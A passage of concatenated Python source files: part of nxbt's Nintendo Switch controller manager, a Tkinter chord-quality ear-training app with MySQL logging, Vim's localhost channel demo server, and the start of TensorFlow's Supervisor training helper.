self.resource_manager.shutdown()
# Re-enable the BlueZ plugins, if we have permission
toggle_clean_bluez(False)
def _command_manager(self, task_queue, state):
"""Used as the main multiprocessing Process that is launched
on startup to handle the message passing and instantiation of
the controllers. Messages are pulled out of a Queue and passed
as appropriately phrased function calls to the ControllerManager.
:param task_queue: A multiprocessing Queue used as the source
of messages
:type task_queue: multiprocessing.Queue
:param state: A dict used to store the shared state of the
emulated controllers.
:type state: multiprocessing.Manager().dict
"""
cm = _ControllerManager(state, self._bluetooth_lock)
# Ensure a SystemExit exception is raised on SIGTERM
# so that we can gracefully shutdown.
signal.signal(signal.SIGTERM, lambda sigterm_handler: sys.exit(0))
try:
while True:
try:
msg = task_queue.get(timeout=5)
except queue.Empty:
msg = None
if msg:
if msg["command"] == NxbtCommands.CREATE_CONTROLLER:
cm.create_controller(
msg["arguments"]["controller_index"],
msg["arguments"]["controller_type"],
msg["arguments"]["adapter_path"],
msg["arguments"]["colour_body"],
msg["arguments"]["colour_buttons"],
msg["arguments"]["reconnect_address"])
elif msg["command"] == NxbtCommands.INPUT_MACRO:
cm.input_macro(
msg["arguments"]["controller_index"],
msg["arguments"]["macro"],
msg["arguments"]["macro_id"])
elif msg["command"] == NxbtCommands.STOP_MACRO:
cm.stop_macro(
msg["arguments"]["controller_index"],
msg["arguments"]["macro_id"])
elif msg["command"] == NxbtCommands.CLEAR_MACROS:
cm.clear_macros(
msg["arguments"]["controller_index"])
elif msg["command"] == NxbtCommands.REMOVE_CONTROLLER:
index = msg["arguments"]["controller_index"]
cm.clear_macros(index)
cm.remove_controller(index)
finally:
cm.shutdown()
sys.exit(0)
def macro(self, controller_index, macro, block=True):
"""Used to input a given macro on a specified controller.
This is done by creating and passing an INPUT_MACRO
message into the task queue with the given macro.
If block is set to True, this function waits until the
macro_id (generated on the submission of the macro)
shows up under the "finished_macros" list communicated
under the controllers shared state.
:param controller_index: The index of a given controller
:type controller_index: int
:param macro: The series of button presses and timings
to be passed to the controller
:type macro: string
:param block: A boolean variable indicating whether or not
to block until the macro completes, defaults to True
:type block: bool, optional
:raises ValueError: If the controller_index does not exist
:return: The generated ID of the passed macro. This ID
will show up under the "finished_macros" list communicated
in the controllers shared state.
:rtype: str
"""
if controller_index not in self.manager_state.keys():
raise ValueError("Specified controller does not exist")
# Get a unique ID to identify the macro
# so we can check when the controller is done inputting it
macro_id = os.urandom(24).hex()
self.task_queue.put({
"command": NxbtCommands.INPUT_MACRO,
"arguments": {
"controller_index": controller_index,
"macro": macro,
"macro_id": macro_id,
}
})
if block:
while True:
finished = (self.manager_state
[controller_index]["finished_macros"])
if macro_id in finished:
break
time.sleep(1/120) # Wait one Pro Controller cycle
return macro_id
def press_buttons(self, controller_index, buttons, down=0.1, up=0.1, block=True):
"""Used to press a given set of buttons on the controller for a
specified up and down duration. This is done by inputting a macro
configured with the specified button presses and timings.
:param controller_index: The index of a given controller
:type controller_index: int
:param buttons: A list of nxbt.Buttons
:type buttons: list
:param down: How long to hold the buttons down for
in seconds, defaults to 0.1
:type down: float, optional
:param up: How long to release the button for
in seconds, defaults to 0.1
:type up: float, optional
:param block: A boolean variable indicating whether or not
to block until the macro completes, defaults to True
:type block: bool, optional
:return: The generated ID of the passed macro. This ID
will show up under the "finished_macros" list communicated
in the controllers shared state.
:rtype: str
"""
macro_buttons = " ".join(buttons)
macro_times = f"{down}s \n{up}s"
macro = macro_buttons + " " + macro_times
macro_id = self.macro(controller_index, macro, block=block)
return macro_id
def tilt_stick(self, controller_index, stick, x, y,
tilted=0.1, released=0.1, block=True):
"""Used to tilt a given stick on the controller for a
specified tilted and released duration. This is done by
inputting a macro configured with the specified stick tilts
and timings.
:param controller_index: The index of a given controller
:type controller_index: int
:param stick: The right or left nxbt.Stick
:type stick: nxbt.Stick
:param x: The positive or negative X-Axis of the stick on
a 0 to 100 scale
:type x: int
:param y: The positive or negative Y-Axis of the stick on
a 0 to 100 scale
:type y: int
:param tilted: The time the stick should remain tilted
for, defaults to 0.1
:type tilted: float, optional
:param released: The time the stick should remain
released for, defaults to 0.1
:type released: float, optional
:type block: bool, optional
:return: The generated ID of the passed macro. This ID
will show up under the "finished_macros" list communicated
in the controllers shared state.
:rtype: str
"""
if controller_index not in self.manager_state.keys():
raise ValueError("Specified controller does not exist")
if x >= 0:
x_parsed = f'+{x:03}'
else:
x_parsed = f'{x:04}'
if y >= 0:
y_parsed = f'+{y:03}'
else:
y_parsed = f'{y:04}'
macro = f'{stick}@{x_parsed}{y_parsed} {tilted}s\n{released}s'
macro_id = self.macro(controller_index, macro, block=block)
return macro_id
def stop_macro(self, controller_index, macro_id, block=True):
"""Used to stop a given macro by its macro ID. After
the macro has been stopped, its macro ID will show up
as a finished macro in the respective controllers
"finished_macros" list communicated in its state.
:param controller_index: The index of a given controller
:type controller_index: int
:param macro_id: The ID of a given macro (queued or running)
:type macro_id: str
:param block: A boolean variable indicating whether or not
to block until the macro is stopped, defaults to True
:type block: bool, optional
:raises ValueError: If the controller_index does not exist
"""
if controller_index not in self.manager_state.keys():
raise ValueError("Specified controller does not exist")
self.task_queue.put({
"command": NxbtCommands.STOP_MACRO,
"arguments": {
"controller_index": controller_index,
"macro_id": macro_id,
}
})
if block:
while True:
finished = (self.manager_state
[controller_index]["finished_macros"])
if macro_id in finished:
break
time.sleep(1/120)
def clear_macros(self, controller_index):
"""Clears all running and queued macros on a specified
controller.
WARNING: Any blocking macro calls will continue to run
forever if this command is run.
:param controller_index: The index of a given controller
:type controller_index: int
:raises ValueError: If the controller_index does not exist
"""
if controller_index not in self.manager_state.keys():
raise ValueError("Specified controller does not exist")
self.task_queue.put({
"command": NxbtCommands.CLEAR_MACROS,
"arguments": {
"controller_index": controller_index,
}
})
def clear_all_macros(self):
"""Clears all running and queued macros on all
controllers.
"""
for controller in self.manager_state.keys():
self.clear_macros(controller)
def set_controller_input(self, controller_index, input_packet):
"""Sets the controllers buttons and analog sticks for 1 cycle.
This means that exactly 1 packet will be sent to the Switch with
input specified with this method. To keep a continuous input
stream of a desired input, packets must be set at a rate that
roughly matches the set controller. Eg: An emulated Pro Controller's
input must be set at roughly 120Hz and a Joy-Con's at 60Hz.
:param controller_index: The index of the emulated controller
:type controller_index: int
:param input_packet: The input packet with the desired input. This
*must* be an instance of the create_input_packet method.
:type input_packet: dict
:raises ValueError: On bad controller index
"""
if controller_index not in self.manager_state.keys():
raise ValueError("Specified controller does not exist")
self.manager_state[controller_index]["direct_input"] = input_packet
def create_input_packet(self):
"""Creates an input packet that is used to specify the input
of a controller for a single cycle.
:return: An input packet dictionary
:rtype: dict
"""
# Create a copy of the direct input packet in a thread safe manner.
# NOTE: Using the copy.deepcopy method of copying dicts IS NOT thread safe.
return json.loads(json.dumps(DIRECT_INPUT_PACKET))
def create_controller(self, controller_type, adapter_path=None,
colour_body=None, colour_buttons=None,
reconnect_address=None):
"""Used to create a Nintendo Switch controller of a
given type and colour on an (optionally) specified
bluetooth adapter.
If no Bluetooth adapter is specified, the first available
adapter is used.
If the reconnect_address is specified, the controller
will attempt to reconnect to the Switch, rather than
simply letting any Switch connect to it. To ensure
that the reconnect succeeds, the Switch must be on
and *not* on the Change Grip/Order menu.
:param controller_type: The type of controller to create
:type controller_type: ControllerTypes
:param adapter_path: The DBus path to a given Bluetooth
adapter, defaults to None
:type adapter_path: str, optional
:param colour_body: The body colour of the controller
represented by a hexadecimal colour value (a list of
three ints (0-255)), defaults to None
:type colour_body: list, optional
:param colour_buttons: The button colour of the controller
represented by a hexadecimal colour value (a list of
three ints (0-255)), defaults to None
:type colour_buttons: list, optional
:param reconnect_address: A previously connected to
Switch's Bluetooth MAC address, defaults to None
:type reconnect_address: str or list, optional
:raises ValueError: If specified adapter is unavailable
:raises ValueError: If specified adapter is in use
:return: The index of the created controller
:rtype: int
"""
if adapter_path:
if adapter_path not in self.get_available_adapters():
raise ValueError("Specified adapter is unavailable")
if adapter_path in self._adapters_in_use.keys():
raise ValueError("Specified adapter in use")
else:
# Get all adapters we can use
usable_adapters = list(
set(self.get_available_adapters()) - set(self._adapters_in_use))
if len(usable_adapters) > 0:
# Use the first available adapter
adapter_path = usable_adapters[0]
else:
raise ValueError("No adapters available")
controller_index = None
try:
self._controller_lock.acquire()
self.task_queue.put({
"command": NxbtCommands.CREATE_CONTROLLER,
"arguments": {
"controller_index": self._controller_counter,
"controller_type": controller_type,
"adapter_path": adapter_path,
"colour_body": colour_body,
"colour_buttons": colour_buttons,
"reconnect_address": reconnect_address,
}
})
controller_index = self._controller_counter
self._controller_counter += 1
self._adapters_in_use[adapter_path] = controller_index
self._controller_adapter_lookup[controller_index] = adapter_path
# Block until the controller is ready
# This needs to be done to prevent race conditions
# on Bluetooth resources.
if type(controller_index) == int:
while True:
if controller_index in self.manager_state.keys():
state = self.manager_state[controller_index]
if (state["state"] == "connecting" or
state["state"] == "reconnecting" or
state["state"] == "crashed"):
break
time.sleep(1/30)
finally:
self._controller_lock.release()
return controller_index
def remove_controller(self, controller_index):
"""Terminates and removes a given controller.
:param controller_index: The index of a given controller
:type controller_index: int
:raises ValueError: If controller does not exist
"""
if controller_index not in self.manager_state.keys():
if controller_index in self._controller_adapter_lookup.keys():
# Attempt to free any adapters claimed by a crashed controller
try:
adapter_path = self._controller_adapter_lookup.pop(controller_index, None)
self._adapters_in_use.pop(adapter_path, None)
except Exception:
pass
raise ValueError("Specified controller does not exist")
self._controller_lock.acquire()
try:
adapter_path = self._controller_adapter_lookup.pop(controller_index, None)
self._adapters_in_use.pop(adapter_path, None)
finally:
self._controller_lock.release()
self.task_queue.put({
"command": NxbtCommands.REMOVE_CONTROLLER,
"arguments": {
"controller_index": controller_index,
}
})
def wait_for_connection(self, controller_index):
"""Blocks until a given controller is connected
to a Nintendo Switch.
:param controller_index: The index of a given controller
:type controller_index: int
"""
while not self.state[controller_index]["state"] == "connected":
if self.state[controller_index]["state"] == "crashed":
raise OSError("The watched controller has crashe with error",
self.state[controller_index]["errors"])
pass
def get_available_adapters(self):
"""Gets the DBus paths of all available Bluetooth
adapters.
:return: A list of available adapter paths
:rtype: list
"""
bus = dbus.SystemBus()
adapters = find_objects(bus, SERVICE_NAME, ADAPTER_INTERFACE)
bus.close()
return adapters
def get_switch_addresses(self):
"""Gets the Bluetooth MAC addresses of all
previously connected Nintendo Switchs
:return: A list of Bluetooth MAC addresses
:rtype: list
"""
return (find_devices_by_alias("Nintendo Switch"))
@property
def state(self):
"""The state of all created and running controllers.
This state is read-only and is represented as a dict.
The state dict's structure follows:
{
"controller_index"
{
"state":
"initializing" or
"connecting" or
"reconnecting" or
"connected" or
"crashed"
"finished_macros":
A list of UUIDs
"errors":
A string with the crash error
"direct_input":
A dictionary that represents all inputs
being directly input into the controller.
}
}
:return: The state dict
:rtype: dict
"""
return self.manager_state
class _ControllerManager():
"""Used as the manager for all controllers. Each controller is
a daemon multiprocessing Process that the ControllerManager
object creates and manages.
The ControllerManager object submits messages to the respective
queues of each controller process for tasks such as macro submission
or macro clearing/stopping.
"""
def __init__(self, state, lock):
self.state = state
self.lock = lock
self.controller_resources = Manager()
self._controller_queues = {}
self._children = {}
def create_controller(self, index, controller_type, adapter_path,
colour_body=None, colour_buttons=None,
reconnect_address=None):
"""Instantiates a given controller as a multiprocessing
Process with a shared state dict and a task queue.
Configuration options are available in the form of
controller colours.
:param index: The index of the controller
:type index: int
:param controller_type: The type of Nintendo Switch controller
:type controller_type: ControllerTypes
:param adapter_path: The DBus path to the Bluetooth adapter
:type adapter_path: str
:param colour_body: A list of three ints representing the hex
colour of the controller, defaults to None
:type colour_body: list, optional
:param colour_buttons: A list of three ints representing the
hex colour of the controller, defaults to None
:type colour_buttons: list, optional
:param reconnect_address: The address of a Nintendo Switch
to reconnect to, defaults to None
:type reconnect_address: str, optional
"""
controller_queue = Queue()
controller_state = self.controller_resources.dict()
controller_state["state"] = "initializing"
controller_state["finished_macros"] = []
controller_state["errors"] = False
controller_state["direct_input"] = json.loads(json.dumps(DIRECT_INPUT_PACKET))
controller_state["colour_body"] = colour_body
controller_state["colour_buttons"] = colour_buttons
controller_state["type"] = str(controller_type)
controller_state["adapter_path"] = adapter_path
controller_state["last_connection"] = None
self._controller_queues[index] = controller_queue
self.state[index] = controller_state
server = ControllerServer(controller_type,
adapter_path=adapter_path,
lock=self.lock,
state=controller_state,
task_queue=controller_queue,
colour_body=colour_body,
colour_buttons=colour_buttons)
controller = Process(target=server.run, args=(reconnect_address,))
controller.daemon = True
self._children[index] = controller
controller.start()
def input_macro(self, index, macro, macro_id):
self._controller_queues[index].put({
"type": "macro",
"macro": macro,
"macro_id": macro_id
})
def stop_macro(self, index, macro_id):
self._controller_queues[index].put({
"type": "stop",
"macro_id": macro_id,
})
def clear_macros(self, index):
self._controller_queues[index].put({
"type": "clear",
})
def remove_controller(self, index):
self._children[index].terminate()
self.state.pop(index, None)
def shutdown(self):
# Loop over children and kill all
for index in self._children.keys():
child = self._children[index]
child.terminate()
self.controller_resources.shutdown()
|
chordnet.py
|
# import music-code modules
from music_code import MusicCode
from sql_kit import SQL_Kit
# audio
import pyaudio
import wave
# data
import numpy as np
import pandas as pd
import mysql.connector
from mysql.connector import MySQLConnection, Error
# plotting
import matplotlib.pyplot as plt
import seaborn
# GUI
from tkinter import *
import tkinter as tk
# more
from pathlib import Path
import datetime
import sys
import os
import threading
import getpass
# Generate random chord using music-code
class random_chord:
def __init__(self):
""" Generate chord with random quality, root note and waveform type """
# initialize Music-Code
self.m = MusicCode(bpm=120)
# waveform types
self.waveform_types = ['sine', 'tri', 'saw1', 'saw2', 'square', 'sine-tri', 'sine-saw', 'sine-square', 'saw-square', 'tri-saw', 'tri-square']
# chord labels
self.all_chord_labels = self.m.all_chords[:73]
# select 4 octaves for root notes
excess_notes_list = list(self.m.freq_note_table_sharp.values())
all_root_notes = []
for item in excess_notes_list:
if ('0' in item) or ('1' in item) or ('5' in item) or ('6' in item) or ('7' in item):
pass
else:
all_root_notes.append(item)
all_root_notes.sort()
self.all_root_notes = all_root_notes
def new_chord(self):
""" Generate chord """
# select random chord label
chord_label_index = int(np.random.randint(0,len(self.all_chord_labels)))
chord_label = self.all_chord_labels[chord_label_index]
# select random root note
root_note_index = int(np.random.randint(0,len(self.all_root_notes)))
root_note = self.all_root_notes[root_note_index]
# select random waveform type
waveform_type_index = np.random.randint(0,len(self.waveform_types))
waveform_type = self.waveform_types[waveform_type_index]
# generate chord using music-code
chord_waveform = self.m.chord(chord_label,root_note,waveform_type,2)
# file name
file_name_wav = root_note + ' '+ chord_label + '_' + waveform_type +'.wav'
# bounce WAV audio
chord_waveform.bounce(file_name_wav,show_visual=False)
return file_name_wav
""" Tkinter GUI with MySQL database connection """
class ChordNet(object):
def __init__(self):
# Connect and update MySQL database
self.database_connect=False
self.userID = None
self.password=None
# generate random chord
self.c = random_chord()
self.file_name = self.c.new_chord()
# set WAV file path
self.m = MusicCode(bpm=120)
self.wav_file_path = self.m.program_files_location+"archive/"+self.file_name
# parse data in file name
self.chord_name = self.file_name.split('_')[0]
self.waveform_type = self.file_name.split('_')[1][:-4]
self.user_input = None
# Tkinter attributes
self.root= tk.Tk()
self.canvas1 = tk.Canvas(self.root, width = 500, height = 350)
self.label4 = None
self.user_response = None
self.HLP = None
# MySQL connection, credentials required
def connect(self):
self.database_connect = True
self.userID = input('User ID: ')
self.password = getpass.getpass('Password: ')
"""Set up Tkinter GUI"""
def play_audio(self):
""" WAV audio playback """
global is_playing
chunk = 1024
wf = wave.open(self.wav_file_path, 'rb')
p = pyaudio.PyAudio()
stream = p.open(
format = p.get_format_from_width(wf.getsampwidth()),
channels = wf.getnchannels(),
rate = wf.getframerate(),
output = True)
data = wf.readframes(chunk)
while data != '' and is_playing: # is_playing to stop playing
stream.write(data)
data = wf.readframes(chunk)
stream.stop_stream()
stream.close()
p.terminate()
def press_button_play(self):
""" Tkinter Button for WAV audio playback """
global is_playing
global my_thread
is_playing = False
if not is_playing:
is_playing = True
my_thread = threading.Thread(target=self.play_audio)
my_thread.start()
def next_iteration(self):
self.c = random_chord()
self.file_name = self.c.new_chord()
self.wav_file_path = self.m.program_files_location+"archive/"+self.file_name
self.chord_name = self.file_name.split('_')[0]
self.waveform_type = self.file_name.split('_')[1][:-4]
self.label4.destroy()
def select_maj(self):
self.user_response='major'
self.submission()
def select_min(self):
self.user_response='minor'
self.submission()
def select_dom(self):
self.user_response='dominant'
self.submission()
def select_dim(self):
self.user_response='diminished'
self.submission()
def select_aug(self):
self.user_response='augmented'
self.submission()
def submission(self):
""" classify user response as correct or incorrect, display result to user, then update database """
# classify chord prediction as either correct or incorrect
if " "+self.user_response[:2] in self.chord_name:
output = 'Correct'+'\n\n'+self.chord_name
else:
output = 'Incorrect'+'\n\n'+self.chord_name
# create tkinter display to show user correct/incorrect message
self.label4 = tk.Label(self.root, text= output)
self.canvas1.create_window(250, 300, window=self.label4)
# update MySQL database
if self.database_connect:
# DATA PREP
event_datetime = datetime.datetime.now()
# actual label
if ' maj' in self.chord_name:
actual_label = 'major'
elif ' min' in self.chord_name:
actual_label = 'minor'
elif ' dom' in self.chord_name:
actual_label = 'dominant'
elif ' dim' in self.chord_name:
actual_label = 'diminished'
elif ' aug' in self.chord_name:
actual_label = 'augmented'
# load user response
response = self.user_response.lower()
# parse chord name to extract root note and chord label
chord_root_note = self.chord_name.split(' ')[0]
chord_type = ""
for item in self.chord_name.split(' ')[1:]:
chord_type = str(chord_type +" "+item)
chord_name_sql=chord_type[1:]
# update database
db = SQL_Kit(userID=self.userID, password=self.password, database='chordnet')
db.chordlog_table(chord_root_note, chord_name_sql, response, actual_label, self.waveform_type)
# if no database connection, pass
else:
pass
def main(self):
""" MAIN """
self.root.title("Chord Net")
self.canvas1.pack()
is_playing = False
my_thread = None
label1 = tk.Label(self.root, text='Chord Net')
label1.config(font=('helvetica', 24))
self.canvas1.create_window(250, 25, window=label1)
label2 = tk.Label(self.root, text='What is the quality of this chord?')
label2.config(font=('helvetica', 11))
self.canvas1.create_window(250, 75, window=label2)
label3 = tk.Label(self.root, text='major, minor, dominant, augmented or diminished')
label3.config(font=('helvetica', 8))
self.canvas1.create_window(250, 100, window=label3)
button1 = Button(self.root, text="PLAY", command=self.press_button_play)
self.canvas1.create_window(250, 150, window=button1)
button3 = Button(self.root, text="NEXT", command=self.next_iteration)
self.canvas1.create_window(250, 250, window=button3)
button4 = Button(self.root, text="MAJ", command=self.select_maj)
self.canvas1.create_window(150, 200, window=button4)
button5 = Button(self.root, text="MIN", command=self.select_min)
self.canvas1.create_window(200, 200, window=button5)
button6 = Button(self.root, text="DOM", command=self.select_dom)
self.canvas1.create_window(250, 200, window=button6)
button7 = Button(self.root, text="DIM", command=self.select_dim)
self.canvas1.create_window(300, 200, window=button7)
button8 = Button(self.root, text="AUG", command=self.select_aug)
self.canvas1.create_window(350, 200, window=button8)
self.root.mainloop()
""" SELECT * FROM table """
def select_table(self, table):
s = SQL_Kit(self.userID, self.password, 'chordnet')
data = s.select_table(table)
return data
def KPI(self, total=True):
""" Return key performance indicator (AVG % chords predicted correctly)"""
data = self.select_table('ChordLog')
correct = data[data['PredictedLabel'] == data['ActualLabel']]
# % correctly predicted in chord net
human_level_performance = (len(correct) / len(data)) * 100
# round value
human_level_performance = round(human_level_performance, 4)
return human_level_performance
def display(self):
""" KPI MOVING AVERAGE """
s = SQL_Kit(self.userID, self.password, 'chordnet')
df = s.select_table('ChordLog')
def day_of_year(datetime_entry):
return datetime_entry.timetuple().tm_yday
df['day_of_year'] = list(df.apply(lambda x: day_of_year(x['ChordDateTime']),axis=1))
day_list = list(df['day_of_year'].unique())
all_days = list(df['day_of_year'])
averages = []
for unique_day in day_list:
data = df[df['day_of_year'] <= unique_day ].copy()
correct = data[data['PredictedLabel'] == data['ActualLabel']]
# % correctly predicted in chord net
human_level_performance = (len(correct) / len(data)) * 100
averages.append(human_level_performance)
daily_count = df['day_of_year'].value_counts().sort_index()
avg_move_df = pd.DataFrame([day_list,averages]).T
avg_move_df.rename(columns={0: 'day_id', 1: 'moving_avg'},inplace=True)
avg_move_df.set_index('day_id',inplace=True)
fig1, ax1 = plt.subplots()
ax1.plot(avg_move_df.index.astype(int),avg_move_df['moving_avg'], color='mediumspringgreen')
ax1.set_title('KPI Moving AVG')
ax1.set_xlabel('day_of_year')
ax1.xaxis.set_ticks([min(all_days), max(all_days)])
ax1.set_ylabel('% Correct')
plt.show()
|
demoserver.py
|
#!/usr/bin/python
#
# Server that will accept connections from a Vim channel.
# Run this server and then in Vim you can open the channel:
# :let handle = ch_open('localhost:8765')
#
# Then Vim can send requests to the server:
# :let response = ch_sendexpr(handle, 'hello!')
#
# And you can control Vim by typing a JSON message here, e.g.:
# ["ex","echo 'hi there'"]
#
# There is no prompt, just type a line and press Enter.
# To exit cleanly type "quit<Enter>".
#
# See ":help channel-demo" in Vim.
#
# This requires Python 2.6 or later.
from __future__ import print_function
import json
import socket
import sys
import threading
try:
# Python 3
import socketserver
except ImportError:
# Python 2
import SocketServer as socketserver
thesocket = None
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
print("=== socket opened ===")
global thesocket
thesocket = self.request
while True:
try:
data = self.request.recv(4096).decode('utf-8')
except socket.error:
print("=== socket error ===")
break
except IOError:
print("=== socket closed ===")
break
if data == '':
print("=== socket closed ===")
break
print("received: {0}".format(data))
try:
decoded = json.loads(data)
except ValueError:
print("json decoding failed")
decoded = [-1, '']
# Send a response if the sequence number is positive.
# Negative numbers are used for "eval" responses.
if decoded[0] >= 0:
if decoded[1] == 'hello!':
response = "got it"
else:
response = "what?"
encoded = json.dumps([decoded[0], response])
print("sending {0}".format(encoded))
self.request.sendall(encoded.encode('utf-8'))
thesocket = None
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
if __name__ == "__main__":
HOST, PORT = "localhost", 8765
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
print("Server loop running in thread: ", server_thread.name)
print("Listening on port {0}".format(PORT))
while True:
typed = sys.stdin.readline()
if "quit" in typed:
print("Goodbye!")
break
if thesocket is None:
print("No socket yet")
else:
print("sending {0}".format(typed))
thesocket.sendall(typed.encode('utf-8'))
server.shutdown()
server.server_close()
|
supervisor.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Training helper that checkpoints models and computes summaries."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import os
import time
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.util.event_pb2 import SessionLog
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import meta_graph
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary as _summary
from tensorflow.python.training import coordinator
from tensorflow.python.training import saver as saver_mod
from tensorflow.python.training import session_manager as session_manager_mod
from tensorflow.python.training import summary_io
from tensorflow.python.training import training_util
class Supervisor(object):
"""A training helper that checkpoints models and computes summaries.
The Supervisor is a small wrapper around a `Coordinator`, a `Saver`,
and a `SessionManager` that takes care of common needs of TensorFlow
training programs.
#### Use for a single program
```python
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that will checkpoint the model in '/tmp/mydir'.
sv = Supervisor(logdir='/tmp/mydir')
# Get a TensorFlow session managed by the supervisor.
with sv.managed_session(FLAGS.master) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
Within the `with sv.managed_session()` block all variables in the graph have
been initialized. In addition, a few services have been started to
checkpoint the model and add summaries to the event log.
If the program crashes and is restarted, the managed session automatically
reinitialize variables from the most recent checkpoint.
The supervisor is notified of any exception raised by one of the services.
After an exception is raised, `should_stop()` returns `True`. In that case
the training loop should also stop. This is why the training loop has to
check for `sv.should_stop()`.
Exceptions that indicate that the training inputs have been exhausted,
`tf.errors.OutOfRangeError`, also cause `sv.should_stop()` to return `True`
but are not re-raised from the `with` block: they indicate a normal
termination.
#### Use for multiple replicas
To train with replicas you deploy the same program in a `Cluster`.
One of the tasks must be identified as the *chief*: the task that handles
initialization, checkpoints, summaries, and recovery. The other tasks
depend on the *chief* for these services.
The only change you have to do to the single program code is to indicate
if the program is running as the *chief*.
```python
# Choose a task as the chief. This could be based on server_def.task_index,
# or job_def.name, or job_def.tasks. It's entirely up to the end user.
# But there can be only one *chief*.
is_chief = (server_def.task_index == 0)
server = tf.train.Server(server_def)
with tf.Graph().as_default():
...add operations to the graph...
# Create a Supervisor that uses log directory on a shared file system.
# Indicate if you are the 'chief'
sv = Supervisor(logdir='/shared_directory/...', is_chief=is_chief)
# Get a Session in a TensorFlow server on the cluster.
with sv.managed_session(server.target) as sess:
# Use the session to train the graph.
while not sv.should_stop():
sess.run(<my_train_op>)
```
In the *chief* task, the `Supervisor` works exactly as in the first example
above. In the other tasks `sv.managed_session()` waits for the Model to have
been initialized before returning a session to the training code. The
non-chief tasks depend on the chief task for initializing the model.
If one of the tasks crashes and restarts, `managed_session()`
checks if the Model is initialized. If yes, it just creates a session and
returns it to the training code that proceeds normally. If the model needs
to be initialized, the chief task takes care of reinitializing it; the other
tasks just wait for the model to have been initialized.
NOTE: This modified program still works fine as a single program.
The single program marks itself as the chief.
#### What `master` string to use
Whether you are running on your machine or in the cluster you can use the
following values for the --master flag:
* Specifying `''` requests an in-process session that does not use RPC.
* Specifying `'local'` requests a session that uses the RPC-based
"Master interface" to run TensorFlow programs. See
[`tf.train.Server.create_local_server()`](#Server.create_local_server) for
details.
* Specifying `'grpc://hostname:port'` requests a session that uses
the RPC interface to a specific , and also allows the in-process
master to access remote tensorflow workers. Often, it is
appropriate to pass `server.target` (for some `tf.train.Server`
named `server).
#### Advanced use
##### Launching additional services
`managed_session()` launches the Checkpoint and Summary services (threads).
If you need more services to run you can simply launch them in the block
controlled by `managed_session()`.
Example: Start a thread to print losses. We want this thread to run
every 60 seconds, so we launch it with `sv.loop()`.
```python
...
sv = Supervisor(logdir='/tmp/mydir')
with sv.managed_session(FLAGS.master) as sess:
sv.loop(60, print_loss, (sess))
while not sv.should_stop():
sess.run(my_train_op)
```
##### Launching fewer services
`managed_session()` launches the "summary" and "checkpoint" threads which use
either the optionally `summary_op` and `saver` passed to the constructor, or
default ones created automatically by the supervisor. If you want to run
your own summary and checkpointing logic, disable these services by passing
`None` to the `summary_op` and `saver` parameters.
Example: Create summaries manually every 100 steps in the chief.
```python
# Create a Supervisor with no automatic summaries.
sv = Supervisor(logdir='/tmp/mydir', is_chief=is_chief, summary_op=None)
# As summary_op was None, managed_session() does not start the
# summary thread.
with sv.managed_session(FLAGS.master) as sess:
for step in xrange(1000000):
if sv.should_stop():
break
if is_chief and step % 100 == 0:
# Create the summary every 100 chief steps.
sv.summary_computed(sess, sess.run(my_summary_op))
else:
# Train normally
sess.run(my_train_op)
```
##### Custom model initialization
`managed_session()` only supports initializing the model by running an
`init_op` or restoring from the latest checkpoint. If you have special
initialization needs, see how to specify a `local_init_op` when creating the
supervisor. You can also use the `SessionManager` directly to create a
session and check if it could be initialized automatically.
@@__init__
@@managed_session
@@prepare_or_wait_for_session
@@start_standard_services
@@start_queue_runners
@@summary_computed
@@stop
@@request_stop
@@should_stop
@@stop_on_exception
@@wait_for_stop
"""
# Value to pass for the 'ready_op', 'init_op', 'summary_op', 'saver',
# and 'global_step' parameters of Supervisor.__init__() to indicate that
# the default behavior should be used.
USE_DEFAULT = 0
def __init__(self,
graph=None,
ready_op=USE_DEFAULT,
ready_for_local_init_op=USE_DEFAULT,
is_chief=True,
init_op=USE_DEFAULT,
init_feed_dict=None,
local_init_op=USE_DEFAULT,
logdir=None,
summary_op=USE_DEFAULT,
saver=USE_DEFAULT,
global_step=USE_DEFAULT,
save_summaries_secs=120,
save_model_secs=600,
recovery_wait_secs=30,
stop_grace_secs=120,
checkpoint_basename="model.ckpt",
session_manager=None,
summary_writer=USE_DEFAULT,
init_fn=None):
"""Create a `Supervisor`.
Args:
graph: A `Graph`. The graph that the model will use. Defaults to the
default `Graph`. The supervisor may add operations to the graph before
creating a session, but the graph should not be modified by the caller
after passing it to the supervisor.
ready_op: 1-D string `Tensor`. This tensor is evaluated by supervisors in
`prepare_or_wait_for_session()` to check if the model is ready to use.
The model is considered ready if it returns an empty array. Defaults to
the tensor returned from `tf.report_uninitialized_variables()` If
`None`, the model is not checked for readiness.
ready_for_local_init_op: 1-D string `Tensor`. This tensor is evaluated by
supervisors in `prepare_or_wait_for_session()` to check if the model is
ready to run the local_init_op.
The model is considered ready if it returns an empty array. Defaults to
the tensor returned from
`tf.report_uninitialized_variables(tf.global_variables())`. If `None`, the
model is not checked for readiness before running local_init_op.
is_chief: If True, create a chief supervisor in charge of initializing
and restoring the model. If False, create a supervisor that relies
on a chief supervisor for inits and restore.
init_op: `Operation`. Used by chief supervisors to initialize the model
when it can not be recovered. Defaults to an `Operation` that
initializes all variables. If `None`, no initialization is done
automatically unless you pass a value for `init_fn`, see below.
init_feed_dict: A dictionary that maps `Tensor` objects to feed values.
